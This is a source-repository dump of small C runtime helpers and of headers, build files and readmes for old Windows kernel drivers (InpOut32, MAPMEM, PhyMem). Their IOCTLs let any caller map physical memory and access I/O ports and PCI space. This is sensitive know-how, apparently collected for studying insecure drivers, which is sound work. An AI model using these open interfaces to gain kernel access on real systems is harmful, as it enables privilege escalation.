| #pragma comment(lib, "libucrt.lib") 30 | #pragma comment(lib, "libvcruntime.lib") 31 | #endif 32 | #endif 33 | #endif 34 | 35 | #define IMAGE_DEBUG_TYPE_POGO 13 36 | 37 | PIMAGE_NT_HEADERS WINAPI CheckSumMappedFile( 38 | _In_ PVOID BaseAddress, 39 | _In_ DWORD FileLength, 40 | _Out_ PDWORD HeaderSum, 41 | _Out_ PDWORD CheckSum 42 | ); 43 | 44 | -------------------------------------------------------------------------------- /source/StripDebug/minirtl/_strcat.c: -------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | char *_strcat_a(char *dest, const char *src) 4 | { 5 | if ( (dest==0) || (src==0) ) 6 | return dest; 7 | 8 | while ( *dest!=0 ) 9 | dest++; 10 | 11 | while ( *src!=0 ) { 12 | *dest = *src; 13 | dest++; 14 | src++; 15 | } 16 | 17 | *dest = 0; 18 | return dest; 19 | } 20 | 21 | wchar_t *_strcat_w(wchar_t *dest, const wchar_t *src) 22 | { 23 | if ( (dest==0) || (src==0) ) 24 | return dest; 25 | 26 | while ( *dest!=0 ) 27 | dest++; 28 | 29 | while ( *src!=0 ) { 30 | *dest = *src; 31 | dest++; 32 | src++; 33 | } 34 | 35 | *dest = 0; 36 | return dest; 37 | } 38 | -------------------------------------------------------------------------------- /source/StripDebug/minirtl/_strcpy.c: -------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | char *_strcpy_a(char *dest, const char *src) 4 | { 5 | char *p; 6 | 7 | if ( (dest==0) || (src==0) ) 8 | return dest; 9 | 10 | if (dest == src) 11 | return dest; 12 | 13 | p = dest; 14 | while ( *src!=0 ) { 15 | *p = *src; 16 | p++; 17 | src++; 18 | } 19 | 20 | *p = 0; 21 | return dest; 22 | } 23 | 24 | wchar_t *_strcpy_w(wchar_t *dest, const wchar_t *src) 25 | { 26 | wchar_t *p; 27 | 28 | if ((dest == 0) || (src == 0)) 29 | return dest; 30 | 31 | if (dest == src) 32 | return dest; 33 | 34 | p = dest; 35 | while ( *src!=0 ) { 36 | *p = *src; 37 | p++; 38 | src++; 39 | } 40 | 41 | *p = 0; 42 | return dest; 43 | } 44 | -------------------------------------------------------------------------------- /source/StripDebug/minirtl/_strlen.c: -------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | size_t _strlen_a(const char *s) 4 | { 5 | char *s0 = (char *)s; 6 | 7 | if ( s==0 ) 8 | return 0; 9 | 10 | while ( *s!=0 ) 11 | s++; 12 | 13 | return (s-s0); 14 | } 15 | 16 | size_t _strlen_w(const wchar_t *s) 17 | { 18 | wchar_t *s0 = (wchar_t *)s; 19 | 20 | if ( s==0 ) 21 | return 0; 22 | 23 | while ( *s!=0 ) 24 | s++; 25 | 26 | return (s-s0); 27 | } 28 | -------------------------------------------------------------------------------- /source/StripDebug/minirtl/cmdline.h: -------------------------------------------------------------------------------- 1 | #ifndef _CMDLINEH_ 2 | #define _CMDLINEH_ 3 | 4 | BOOL GetCommandLineParamW( 5 | IN LPCWSTR CmdLine, 6 | IN ULONG ParamIndex, 7 | OUT LPWSTR Buffer, 8 | IN ULONG BufferSize, 9 | OUT PULONG ParamLen 10 | ); 11 | 12 | BOOL GetCommandLineParamA( 13 | IN LPCSTR CmdLine, 14 | IN ULONG ParamIndex, 15 | OUT LPSTR Buffer, 16 | IN ULONG BufferSize, 17 | OUT PULONG ParamLen 18 | ); 19 | 20 | char *ExtractFilePathA(const char *FileName, char *FilePath); 21 | wchar_t *ExtractFilePathW(const wchar_t *FileName, wchar_t *FilePath); 22 | 23 | #ifdef UNICODE 24 | 25 | #define ExtractFilePath ExtractFilePathW 26 | #define GetCommandLineParam GetCommandLineParamW 27 | 28 | #else // ANSI 29 | 30 | #define ExtractFilePath ExtractFilePathA 31 | #define GetCommandLineParam GetCommandLineParamA 32 | 33 | #endif 34 | 35 | #endif /* _CMDLINEH_ */ 36 | -------------------------------------------------------------------------------- /source/StripDebug/minirtl/rtltypes.h: -------------------------------------------------------------------------------- 1 | #ifndef _WCHAR_T_DEFINED 2 | typedef unsigned short wchar_t; 3 | #define _WCHAR_T_DEFINED 4 | #endif /* _WCHAR_T_DEFINED */ 5 | 6 | #ifndef _SIZE_T_DEFINED 7 | #ifdef _WIN64 8 | typedef unsigned __int64 size_t; 9 | #else /* _WIN64 */ 10 | typedef __w64 unsigned int size_t; 11 | #endif /* _WIN64 */ 12 | #define _SIZE_T_DEFINED 13 | #endif /* _SIZE_T_DEFINED */ 14 | 15 | __forceinline char locase_a(char c) 16 | { 17 | if ((c >= 'A') && (c <= 'Z')) 18 | return c + 0x20; 19 | else 20 | return c; 21 | } 22 | 23 | __forceinline wchar_t locase_w(wchar_t c) 24 | { 25 | if ((c >= 'A') && (c <= 'Z')) 26 | return c + 0x20; 27 | else 28 | return c; 29 | } 30 | 31 | __forceinline char byteabs(char x) { 32 | if (x < 0) 33 | return -x; 34 | return x; 35 | } 36 | 37 | __forceinline int _isdigit_a(char x) { 38 | return ((x >= '0') && (x <= '9')); 39 | } 40 | 41 | __forceinline int _isdigit_w(wchar_t x) { 42 | return ((x >= L'0') && (x <= L'9')); 43 | } 44 | -------------------------------------------------------------------------------- /source/WormholeDrivers/INPOUT/HWInterfaceDrv.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 9.00 3 | # Visual Studio 2005 4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "HWInterfaceDrv", "HWInterfaceDrv.vcproj", "{95B297EE-9E8E-464B-B626-A69C9ED13158}" 5 | EndProject 6 | Global 7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 8 | Debug|Win32 = Debug|Win32 9 | Release|Win32 = Release|Win32 10 | EndGlobalSection 11 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 12 | {95B297EE-9E8E-464B-B626-A69C9ED13158}.Debug|Win32.ActiveCfg = Debug|Win32 13 | {95B297EE-9E8E-464B-B626-A69C9ED13158}.Debug|Win32.Build.0 = Debug|Win32 14 | {95B297EE-9E8E-464B-B626-A69C9ED13158}.Release|Win32.ActiveCfg = Release|Win32 15 | {95B297EE-9E8E-464B-B626-A69C9ED13158}.Release|Win32.Build.0 = Release|Win32 16 | EndGlobalSection 17 | GlobalSection(SolutionProperties) = preSolution 18 | HideSolutionNode = FALSE 19 | EndGlobalSection 20 | EndGlobal 21 | -------------------------------------------------------------------------------- /source/WormholeDrivers/INPOUT/HWInterfaceDrv.vcproj: -------------------------------------------------------------------------------- 1 | 2 | 10 | 11 | 14 | 15 | 16 | 17 | 18 | 24 | 37 | 38 | 44 | 57 | 58 | 59 | 60 | 61 | 62 | 67 | 70 | 71 | 72 | 77 | 80 | 81 | 82 | 87 | 90 | 91 | 92 | 95 | 96 | 99 | 100 | 103 | 104 | 105 | 106 | 107 | 108 | -------------------------------------------------------------------------------- /source/WormholeDrivers/INPOUT/MAKEFILE: -------------------------------------------------------------------------------- 1 | # 2 | # DO NOT EDIT THIS FILE!!! Edit .\sources. if you want to add a new source 3 | # file to this component. This file merely indirects to the real make file 4 | # that is shared by all the driver components of the Windows NT DDK 5 | # 6 | 7 | !INCLUDE $(NTMAKEENV)\makefile.def 8 | -------------------------------------------------------------------------------- /source/WormholeDrivers/INPOUT/ReadMe.txt: -------------------------------------------------------------------------------- 1 | InpOut32Drv Driver Interface DLL 2 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 3 | 4 | Modified for x64 compatibility and built by Phillip Gibbons (Phil@highrez.co.uk). 5 | See http://www.highrez.co.uk/Downloads/InpOut32 or the Highrez Forums (http://forums.highrez.co.uk) for information. 6 | Many thanks to Red Fox UK for supporting the community and providing Driver signatures allowing Vista/7 x64 compatibility. 7 | 8 | 9 | 10 | Based on the original written by Logix4U (www.logix4u.net). 11 | 12 | 13 | Notes: 14 | 15 | The InpOut32 device driver supports writing to "old fashioned" hardware port addresses. 16 | It does NOT support USB devices such as USB Parallel ports or even PCI parallel ports (as I am lead to believe). 17 | 18 | 19 | The device driver is installed at runtime. To do this however needs administrator privileges. 20 | On Vista & later, using UAC, you can run the InstallDriver.exe in the \Win32 folder to install the driver 21 | appropriate for your OS. Doing so will request elevation and ask for your permission (or for the administrator 22 | password). Once the driver is installed for the first time, it can then be used by any user *without* 23 | administrator privileges 24 | 25 | -------------------------------------------------------------------------------- /source/WormholeDrivers/INPOUT/SOURCES: -------------------------------------------------------------------------------- 1 | # 2 | # setup visualC++ source browsing 3 | # 4 | BSCMAKE_FLAGS=$(BSCMAKE_FLAGS) -n 5 | 6 | 7 | 8 | !if $(AMD64) 9 | ! message BUILDMSG: Info : Building amd64 Inpoutx64.sys 10 | TARGETNAME=inpoutx64 11 | !else 12 | !message BUILDMSG: Info : Building i386 Inpout32.sys 13 | TARGETNAME=inpout32 14 | !endif 15 | 16 | _NT_TARGET_VERSION = 0x0500 17 | TARGETPATH=obj 18 | TARGETTYPE=DRIVER 19 | INCLUDES=..\ 20 | 21 | SOURCES=hwinterfacedrv.c hwinterfacedrv.rc 22 | -------------------------------------------------------------------------------- /source/WormholeDrivers/INPOUT/hwinterfacedrv.h: -------------------------------------------------------------------------------- 1 | 2 | #define IOCTL_READ_PORT_UCHAR -1673519100 //CTL_CODE(40000, 0x801, METHOD_BUFFERED, FILE_ANY_ACCESS) 3 | #define IOCTL_WRITE_PORT_UCHAR -1673519096 //CTL_CODE(40000, 0x802, METHOD_BUFFERED, FILE_ANY_ACCESS) 4 | #define IOCTL_READ_PORT_USHORT -1673519092 //CTL_CODE(40000, 0x803, METHOD_BUFFERED, FILE_ANY_ACCESS) 5 | #define IOCTL_WRITE_PORT_USHORT -1673519088 //CTL_CODE(40000, 0x804, METHOD_BUFFERED, FILE_ANY_ACCESS) 6 | #define IOCTL_READ_PORT_ULONG -1673519084 //CTL_CODE(40000, 0x805, METHOD_BUFFERED, FILE_ANY_ACCESS) 7 | #define IOCTL_WRITE_PORT_ULONG -1673519080 //CTL_CODE(40000, 0x806, METHOD_BUFFERED, FILE_ANY_ACCESS) 8 | 9 | #define IOCTL_WINIO_MAPPHYSTOLIN -1673519076 10 | #define IOCTL_WINIO_UNMAPPHYSADDR -1673519072 11 | 12 | #pragma pack(push) 13 | #pragma pack(1) 14 | 15 | struct tagPhys32Struct 16 | { 17 | HANDLE PhysicalMemoryHandle; 18 | SIZE_T dwPhysMemSizeInBytes; 19 | PVOID pvPhysAddress; 20 | PVOID pvPhysMemLin; 21 | }; 22 | 23 | extern struct tagPhys32Struct Phys32Struct; 24 | 25 | #pragma pack(pop) -------------------------------------------------------------------------------- /source/WormholeDrivers/INPOUT/hwinterfacedrv.rc: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | #define VER_FILETYPE VFT_DRV 5 | #define VER_FILESUBTYPE VFT2_DRV_SYSTEM 6 | #ifdef _AMD64_ 7 | #define VER_INTERNALNAME_STR "inpoutx64.sys" 8 | #define VER_ORIGINALFILENAME_STR "inpoutx64.sys" 9 | #define VER_PRODUCTNAME_STR "inpoutx64 Driver Version 1.2" 10 | #define VER_PRODUCTVERSION_STR "1.2 x64" 11 | #else 12 | #define VER_INTERNALNAME_STR "inpout32.sys" 13 | #define VER_ORIGINALFILENAME_STR "inpout32.sys" 14 | #define VER_PRODUCTNAME_STR "inpout32 Driver Version 1.2" 15 | #define VER_PRODUCTVERSION_STR "1.2" 16 | #endif 17 | #define VER_FILEDESCRIPTION_STR "Kernel level port access driver" 18 | #define VER_COMPANYNAME_STR "Highresolution Enterprises [www.highrez.co.uk]" 19 | #define VER_LEGALCOPYRIGHT_STR "Copyright (c) 2008 Highresolution Enterprises. Portions Copyright (c) Logix4u" 20 | #define VER_PRODUCTVERSION 1,2,00,000 21 | 22 | #include "common.ver" 23 | -------------------------------------------------------------------------------- /source/WormholeDrivers/INPOUT/license.txt: -------------------------------------------------------------------------------- 1 | Copyright (c) <2003-2015> Phil Gibbons 2 | Portions Copyright (c) <2000> 3 | 4 | Permission is hereby granted, free of charge, to any person obtaining a copy 5 | of this software and associated documentation files (the "Software"), to deal 6 | in the Software without restriction, including without limitation the rights 7 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 8 | copies of the Software, and to permit persons to whom the Software is 9 | furnished to do so, subject to the following conditions: 10 | 11 | 12 | 13 | The above copyright notice and this permission notice shall be included in 14 | all copies or substantial portions of the Software. 15 | 16 | 17 | 18 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 19 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 20 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 21 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 22 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 23 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN 24 | THE SOFTWARE. -------------------------------------------------------------------------------- /source/WormholeDrivers/MAPMEM/DIRS: -------------------------------------------------------------------------------- 1 | DIRS=exe \ 2 | sys 3 | -------------------------------------------------------------------------------- /source/WormholeDrivers/MAPMEM/EXE/MAKEFILE: -------------------------------------------------------------------------------- 1 | # 2 | # DO NOT EDIT THIS FILE!!! Edit .\sources. if you want to add a new source 3 | # file to this component. This file merely indirects to the real make file 4 | # that is shared by all the driver components of the Windows NT DDK 5 | # 6 | 7 | !INCLUDE $(NTMAKEENV)\makefile.def 8 | -------------------------------------------------------------------------------- /source/WormholeDrivers/MAPMEM/EXE/MAPTEST.MAK: -------------------------------------------------------------------------------- 1 | # Nmake macros for building Windows 32-Bit apps 2 | 3 | !include 4 | 5 | all: maptest.exe 6 | 7 | maptest.obj: maptest.c 8 | $(cc) $(cflags) $(cvars) $(cdebug) -I..\sys maptest.c 9 | 10 | maptest.exe: maptest.obj 11 | $(link) $(linkdebug) $(conflags) -out:maptest.exe maptest.obj $(conlibs) 12 | -------------------------------------------------------------------------------- /source/WormholeDrivers/MAPMEM/EXE/SOURCES: -------------------------------------------------------------------------------- 1 | 2 | TARGETNAME=maptest 3 | TARGETPATH=$(BASEDIR)\lib 4 | TARGETTYPE=PROGRAM 5 | 6 | INCLUDES=..\sys;$(BASEDIR)\src\video\inc 7 | 8 | SOURCES=maptest.c 9 | 10 | UMTYPE=console 11 | UMBASE=0x100000 12 | -------------------------------------------------------------------------------- /source/WormholeDrivers/MAPMEM/README.TXT: -------------------------------------------------------------------------------- 1 | Build & Run Instructions: 2 | ------------------------- 3 | 4 | The MAPMEM sample demonstrates how a kernel-mode device driver 5 | can utilize the Zw*MapViewOfSection APIs to (un)map a physical 6 | address into a user-mode process's address space. 7 | 8 | 9 | NOTE: Microsoft does not recommend architecting Win32 applications 10 | such that they read/write directly on physical memory. 11 | User-mode applications are not considered "trusted" parts 12 | of the system, and giving hardware access to untrusted 13 | modules seriously impairs system security. 14 | 15 | We encourage developers who need hardware access to locate 16 | their hardware I/O code in a device driver, and have their 17 | Win32 app communicate it's requests to the driver via the 18 | DeviceIoControl() API. 19 | 20 | 21 | This sample is composed of two parts, a Windows NT kernel-mode 22 | device driver (MAPMEM) and a Win32 test application (MAPTEST). 23 | 24 | 25 | The Win32 portion contains a file, MAPTEST.C, which attempts to 26 | obtain a handle to MAPMEM & send it IOCTLs. The executable is built 27 | using the Windows NT SDK. First update the environment and path by 28 | running \setenv.bat. Then change to the directory where 29 | you have the C source code and the makefile. Type "nmake /f maptest.mak" 30 | to compile the Win32 program, MAPTEST.EXE. 31 | 32 | 33 | The kernel driver portion contains the driver source code, MAPMEM.C 34 | and a text file used to configure your registry so that the driver 35 | can be loaded. The driver is built using the Windows NT DDK. 36 | 37 | To build the driver: 38 | 39 | 40 | 1. Assuming you have run \setenv.bat and 41 | \setenv.bat, build the driver by typing: 42 | 43 | build -cef 44 | 45 | (If there are any errors have a look at the build.log, build.err, 46 | and build.wrn files to get an idea of what went wrong.) 47 | 48 | 49 | 2. Copy the newly built driver, \lib\*\MAPMEM.SYS to the 50 | \system32\drivers\ directory, i.e.: 51 | 52 | copy \ntddk\lib\i386\free\mapmem.sys c:\winnt\system32\drivers\ 53 | 54 | 55 | 3. Update the registry by running regini.exe on the mapmem.ini 56 | file, i.e.: 57 | 58 | regini mapmem.ini 59 | 60 | This adds a MAPMEM driver key under the HKEY_LOCAL_MACHINE\ 61 | SYSTEM\CurrentControlSet\Services tree in the registry. You 62 | can verify this by starting REGEDIT.EXE and looking in the 63 | appropriate place. 64 | 65 | 66 | 4. Reboot. 67 | 68 | 69 | 5. Type: 70 | 71 | net start mapmem 72 | 73 | ...and then execute MAPTEST.EXE. 74 | -------------------------------------------------------------------------------- /source/WormholeDrivers/MAPMEM/SYS/MAKEFILE: -------------------------------------------------------------------------------- 1 | # 2 | # DO NOT EDIT THIS FILE!!! Edit .\sources. if you want to add a new source 3 | # file to this component. This file merely indirects to the real make file 4 | # that is shared by all the driver components of the Windows NT DDK 5 | # 6 | 7 | !INCLUDE $(NTMAKEENV)\makefile.def 8 | -------------------------------------------------------------------------------- /source/WormholeDrivers/MAPMEM/SYS/MAPMEM.H: -------------------------------------------------------------------------------- 1 | /*++ 2 | 3 | Copyright (c) 1993 Microsoft Corporation 4 | 5 | Module Name: 6 | 7 | mapmem.h 8 | 9 | Abstract: 10 | 11 | 12 | Environment: 13 | 14 | kernel & User mode 15 | 16 | Notes: 17 | 18 | 19 | Revision History: 20 | 21 | --*/ 22 | 23 | 24 | // 25 | // Define the various device type values. Note that values used by Microsoft 26 | // Corporation are in the range 0-32767, and 32768-65535 are reserved for use 27 | // by customers. 28 | // 29 | 30 | #define FILE_DEVICE_MAPMEM 0x00008000 31 | 32 | 33 | 34 | // 35 | // Macro definition for defining IOCTL and FSCTL function control codes. Note 36 | // that function codes 0-2047 are reserved for Microsoft Corporation, and 37 | // 2048-4095 are reserved for customers. 38 | // 39 | 40 | #define MAPMEM_IOCTL_INDEX 0x800 41 | 42 | 43 | // 44 | // Define our own private IOCTL 45 | // 46 | 47 | #define IOCTL_MAPMEM_MAP_USER_PHYSICAL_MEMORY CTL_CODE(FILE_DEVICE_MAPMEM , \ 48 | MAPMEM_IOCTL_INDEX, \ 49 | METHOD_BUFFERED, \ 50 | FILE_ANY_ACCESS) 51 | 52 | #define IOCTL_MAPMEM_UNMAP_USER_PHYSICAL_MEMORY CTL_CODE(FILE_DEVICE_MAPMEM, \ 53 | MAPMEM_IOCTL_INDEX+1,\ 54 | METHOD_BUFFERED, \ 55 | FILE_ANY_ACCESS) 56 | 57 | 58 | 59 | 60 | // 61 | // Our user mode app will pass an initialized structure like this 62 | // down to the kernel mode driver 63 | // 64 | 65 | typedef struct 66 | { 67 | INTERFACE_TYPE InterfaceType; // Isa, Eisa, etc.... 68 | ULONG BusNumber; // Bus number 69 | PHYSICAL_ADDRESS BusAddress; // Bus-relative address 70 | ULONG AddressSpace; // 0 is memory, 1 is I/O 71 | ULONG Length; // Length of section to map 72 | 73 | } PHYSICAL_MEMORY_INFO, *PPHYSICAL_MEMORY_INFO; 74 | -------------------------------------------------------------------------------- /source/WormholeDrivers/MAPMEM/SYS/MAPMEM.INI: -------------------------------------------------------------------------------- 1 | \registry\machine\system\currentcontrolset\services\MapMem 2 | Type = REG_DWORD 0x00000001 3 | Start = REG_DWORD 0x00000003 4 | Group = Extended base 5 | ErrorControl = REG_DWORD 0x00000001 6 | -------------------------------------------------------------------------------- /source/WormholeDrivers/MAPMEM/SYS/SOURCES: -------------------------------------------------------------------------------- 1 | TARGETNAME=mapmem 2 | TARGETPATH=$(BASEDIR)\lib 3 | TARGETTYPE=DRIVER 4 | 5 | SOURCES=mapmem.c 6 | -------------------------------------------------------------------------------- /source/WormholeDrivers/PHYMEM/LICENSE: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Misc/edbcd01340327732b55afcd52e6540a2cbe4eced/source/WormholeDrivers/PHYMEM/LICENSE -------------------------------------------------------------------------------- /source/WormholeDrivers/PHYMEM/LICENSE.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Misc/edbcd01340327732b55afcd52e6540a2cbe4eced/source/WormholeDrivers/PHYMEM/LICENSE.html -------------------------------------------------------------------------------- /source/WormholeDrivers/PHYMEM/PCIFlt/DebugPrint.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Misc/edbcd01340327732b55afcd52e6540a2cbe4eced/source/WormholeDrivers/PHYMEM/PCIFlt/DebugPrint.c -------------------------------------------------------------------------------- /source/WormholeDrivers/PHYMEM/PCIFlt/DebugPrint.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Misc/edbcd01340327732b55afcd52e6540a2cbe4eced/source/WormholeDrivers/PHYMEM/PCIFlt/DebugPrint.h -------------------------------------------------------------------------------- /source/WormholeDrivers/PHYMEM/PCIFlt/PCIFilter.h: -------------------------------------------------------------------------------- 1 | #ifndef __PCIFILTER_H 2 | #define __PCIFILTER_H 3 | 4 | typedef enum tagDEVICE_PNP_STATE 5 | { 6 | NotStarted=0, // Not started yet 7 | Started, // Device has received the START_DEVICE IRP 8 | StopPending, // Device has received the QUERY_STOP IRP 9 | Stopped, // Device has received the STOP_DEVICE IRP 10 | RemovePending, // Device has received the QUERY_REMOVE IRP 11 | SurpriseRemovePending, // Device has received the SURPRISE_REMOVE IRP 12 | Deleted // Device has received the REMOVE_DEVICE IRP 13 | } DEVICE_PNP_STATE; 14 | 15 | #define INITIALIZE_PNP_STATE(_Data_) \ 16 | (_Data_)->DevicePnPState=NotStarted;\ 17 | (_Data_)->PreviousPnPState=NotStarted; 18 | 19 | #define SET_NEW_PNP_STATE(_Data_, _state_) \ 20 | (_Data_)->PreviousPnPState=(_Data_)->DevicePnPState; \ 21 | (_Data_)->DevicePnPState=(_state_); 22 | 23 | #define RESTORE_PREVIOUS_PNP_STATE(_Data_) \ 24 | (_Data_)->DevicePnPState=(_Data_)->PreviousPnPState; 25 | 26 | typedef struct tagDEVICE_EXTENSION 27 | { 28 | //physical device object 29 | PDEVICE_OBJECT pdo; 30 | 31 | //the device object we attached to 32 | PDEVICE_OBJECT lowerdo; 33 | 34 | //current pnp state 35 | DEVICE_PNP_STATE DevicePnPState; 36 | 37 | //previous pnp state 38 | DEVICE_PNP_STATE PreviousPnPState; 39 | 40 | //Remove Lock 41 | IO_REMOVE_LOCK rmLock; 42 | 43 | } DEVICE_EXTENSION, *PDEVICE_EXTENSION; 44 | 45 | #endif //__PCIFILTERZ_H -------------------------------------------------------------------------------- /source/WormholeDrivers/PHYMEM/PCIFlt/PCIFlt.dsw: -------------------------------------------------------------------------------- 1 | Microsoft Developer Studio Workspace File, Format Version 6.00 2 | # WARNING: DO NOT EDIT OR DELETE THIS WORKSPACE FILE! 3 | 4 | ############################################################################### 5 | 6 | Project: "PCIFlt"=.\PCIFlt.dsp - Package Owner=<4> 7 | 8 | Package=<5> 9 | {{{ 10 | }}} 11 | 12 | Package=<4> 13 | {{{ 14 | }}} 15 | 16 | ############################################################################### 17 | 18 | Global: 19 | 20 | Package=<5> 21 | {{{ 22 | }}} 23 | 24 | Package=<3> 25 | {{{ 26 | }}} 27 | 28 | ############################################################################### 29 | 30 | -------------------------------------------------------------------------------- /source/WormholeDrivers/PHYMEM/PCIFlt/Release/PCIFilter.inf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Misc/edbcd01340327732b55afcd52e6540a2cbe4eced/source/WormholeDrivers/PHYMEM/PCIFlt/Release/PCIFilter.inf -------------------------------------------------------------------------------- /source/WormholeDrivers/PHYMEM/PCIFlt/Release/PCIFlt.sys: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Misc/edbcd01340327732b55afcd52e6540a2cbe4eced/source/WormholeDrivers/PHYMEM/PCIFlt/Release/PCIFlt.sys -------------------------------------------------------------------------------- /source/WormholeDrivers/PHYMEM/PhyMem/driver/AccessBus.c: -------------------------------------------------------------------------------- 1 | /*++ 2 | access pci bus configuration 3 | --*/ 4 | 5 | #include 6 | #include 7 | #include "DebugPrint.h" 8 | 9 | //gets the bus interface standard information from the PDO. 10 | NTSTATUS GetBusInterface(IN PDEVICE_OBJECT pcifido, 11 | OUT PPCI_BUS_INTERFACE_STANDARD busInterface) 12 | { 13 | KEVENT event; 14 | NTSTATUS ntStatus; 15 | PIRP irp; 16 | IO_STATUS_BLOCK ioStatus; 17 | PIO_STACK_LOCATION irpStack; 18 | 19 | if (pcifido==NULL) 20 | return STATUS_UNSUCCESSFUL; 21 | 22 | KeInitializeEvent(&event, NotificationEvent, FALSE); 23 | 24 | irp=IoBuildSynchronousFsdRequest(IRP_MJ_PNP, 25 | pcifido, 26 | NULL, 27 | 0, 28 | NULL, 29 | &event, 30 | &ioStatus); 31 | 32 | if (irp==NULL) 33 | { 34 | return STATUS_INSUFFICIENT_RESOURCES; 35 | } 36 | 37 | irpStack=IoGetNextIrpStackLocation(irp); 38 | irpStack->MinorFunction=IRP_MN_QUERY_INTERFACE; 39 | irpStack->Parameters.QueryInterface.InterfaceType=(LPGUID)&GUID_PCI_BUS_INTERFACE_STANDARD; 40 | irpStack->Parameters.QueryInterface.Size=sizeof(PCI_BUS_INTERFACE_STANDARD); 41 | irpStack->Parameters.QueryInterface.Version=PCI_BUS_INTERFACE_STANDARD_VERSION; 42 | irpStack->Parameters.QueryInterface.Interface=(PINTERFACE)busInterface; 43 | irpStack->Parameters.QueryInterface.InterfaceSpecificData=NULL; 44 | 45 | //initialize the status to error in case the bus driver does not 46 | //set it correctly. 47 | irp->IoStatus.Status=STATUS_NOT_SUPPORTED ; 48 | 49 | ntStatus=IoCallDriver(pcifido, irp); 50 | 51 | if (ntStatus==STATUS_PENDING) 52 | { 53 | KeWaitForSingleObject(&event, Executive, KernelMode, FALSE, NULL); 54 | 55 | ntStatus=ioStatus.Status; 56 | } 57 | 58 | return ntStatus; 59 | } 60 | -------------------------------------------------------------------------------- /source/WormholeDrivers/PHYMEM/PhyMem/driver/DebugPrint.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Misc/edbcd01340327732b55afcd52e6540a2cbe4eced/source/WormholeDrivers/PHYMEM/PhyMem/driver/DebugPrint.c -------------------------------------------------------------------------------- /source/WormholeDrivers/PHYMEM/PhyMem/driver/DebugPrint.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Misc/edbcd01340327732b55afcd52e6540a2cbe4eced/source/WormholeDrivers/PHYMEM/PhyMem/driver/DebugPrint.h -------------------------------------------------------------------------------- /source/WormholeDrivers/PHYMEM/PhyMem/driver/phymem.dsw: -------------------------------------------------------------------------------- 1 | Microsoft Developer Studio Workspace File, Format Version 6.00 2 | # WARNING: DO NOT EDIT OR DELETE THIS WORKSPACE FILE! 3 | 4 | ############################################################################### 5 | 6 | Project: "phymem"=.\phymem.dsp - Package Owner=<4> 7 | 8 | Package=<5> 9 | {{{ 10 | }}} 11 | 12 | Package=<4> 13 | {{{ 14 | }}} 15 | 16 | ############################################################################### 17 | 18 | Global: 19 | 20 | Package=<5> 21 | {{{ 22 | }}} 23 | 24 | Package=<3> 25 | {{{ 26 | }}} 27 | 28 | ############################################################################### 29 | 30 | -------------------------------------------------------------------------------- /source/WormholeDrivers/PHYMEM/PhyMem/driver/phymem.h: -------------------------------------------------------------------------------- 1 | #ifndef __PHYMEM_H 2 | #define __PHYMEM_H 3 | 4 | #define FILE_DEVICE_PHYMEM 0x8000 5 | 6 | #define IOCTL_PHYMEM_MAP \ 7 | CTL_CODE(FILE_DEVICE_PHYMEM, 0x800,\ 8 | METHOD_BUFFERED, FILE_ANY_ACCESS) 9 | 10 | #define IOCTL_PHYMEM_UNMAP \ 11 | CTL_CODE(FILE_DEVICE_PHYMEM, 0x801,\ 12 | METHOD_BUFFERED, FILE_ANY_ACCESS) 13 | 14 | #define IOCTL_PHYMEM_GETPORT \ 15 | CTL_CODE(FILE_DEVICE_PHYMEM, 0x802,\ 16 | METHOD_BUFFERED, FILE_ANY_ACCESS) 17 | 18 | #define IOCTL_PHYMEM_SETPORT \ 19 | CTL_CODE(FILE_DEVICE_PHYMEM, 0x803,\ 20 | METHOD_BUFFERED, FILE_ANY_ACCESS) 21 | 22 | #define IOCTL_PHYMEM_GETPCI \ 23 | CTL_CODE(FILE_DEVICE_PHYMEM, 0x804,\ 24 | METHOD_OUT_DIRECT, FILE_ANY_ACCESS) 25 | 26 | #define IOCTL_PHYMEM_SETPCI \ 27 | CTL_CODE(FILE_DEVICE_PHYMEM, 0x805,\ 28 | METHOD_OUT_DIRECT, FILE_ANY_ACCESS) 29 | 30 | typedef struct tagPHYMEM_MEM 31 | { 32 | PVOID pvAddr; //physical addr when mapping, virtual addr when unmapping 33 | ULONG dwSize; //memory size to map or unmap 34 | } PHYMEM_MEM, *PPHYMEM_MEM; 35 | 36 | typedef struct tagPHYMEM_PORT 37 | { 38 | ULONG dwPort; //port number: 0-0xFFFF 39 | ULONG dwSize; //must be 1, 2, 4 40 | ULONG dwValue; //new value to set 41 | } PHYMEM_PORT, *PPHYMEM_PORT; 42 | 43 | typedef struct tagPHYMEM_PCI 44 | { 45 | ULONG dwBusNum; //bus number: 0-255 46 | ULONG dwDevNum; //device number: 0-31 47 | ULONG dwFuncNum; //function number: 0-7 48 | ULONG dwRegOff; //register offset: 0-255 49 | ULONG dwBytes; //bytes to read or write 50 | } PHYMEM_PCI, *PPHYMEM_PCI; 51 | 52 | #endif //__PHYMEM_H 53 | -------------------------------------------------------------------------------- 